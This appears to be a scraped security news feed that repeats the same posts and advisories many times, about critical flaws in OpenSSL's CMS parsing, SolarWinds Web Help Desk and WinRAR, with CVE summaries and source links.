- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
🔴 CVE-2025-15467 - Critical (9.8)
Issue summary: Parsing CMS AuthEnvelopedData message with maliciously
crafted AEAD parameters can trigger a stack buffer overflow.
Impact summary: A stack buffer overflow may lead to a crash, causing Denial
of Service, or potentially remote code ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15467/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##Yes, there's RCE in #OpenSSL 3.x, but thankfully it isn't in the HTTPS side of things:
"Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
Discussion: https://news.ycombinator.com/item?id=46782662
OpenSSL Security Advisory
https://openssl-library.org/news/secadv/20260127.txt
One high, one medium, and 9 low severity issues.
The high severity is a stack buffer overflow in CMS AuthEnvelopedData parsing (CVE-2025-15467): attacker provides an oversized IV, leading to buffer overflow prior to authentication, possibly leading to remote code execution if you're parsing untrusted CMS or PKCS#7 content with AEAD (e.g., AES-GCM).
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
Comments: https://news.ycombinator.com/item?id=46782662
OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
#ycombinator
OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##updated 2026-01-29T16:31:35.700000
9 posts
⚠️ Critical Solarwinds Web Vulnerability Allows Remote Code Execution and Security Bypass
「 Multiple critical vulnerabilities in SolarWinds Web Help Desk (WHD), culminating in unauthenticated remote code execution (RCE) via Java deserialization in CVE-2025-40551, were uncovered by https://Horizon3.ai researchers.
These flaws chain static credentials, security bypasses, and deserialization weaknesses, affecting versions prior to 2026.1 」
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
⚠️ Critical Solarwinds Web Vulnerability Allows Remote Code Execution and Security Bypass
「 Multiple critical vulnerabilities in SolarWinds Web Help Desk (WHD), culminating in unauthenticated remote code execution (RCE) via Java deserialization in CVE-2025-40551, were uncovered by https://Horizon3.ai researchers.
These flaws chain static credentials, security bypasses, and deserialization weaknesses, affecting versions prior to 2026.1 」
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.
These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.
CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)
CVE-2025-40551: SolarWinds WebHelpDesk RCE Deep-Dive and Indicators of Compromise https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/
##🔴 CVE-2025-40551 - Critical (9.8)
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without au...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40551/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
6 posts
1 repos
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.
These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.
CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)
🔴 CVE-2025-40554 - Critical (9.8)
SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40554/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
6 posts
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
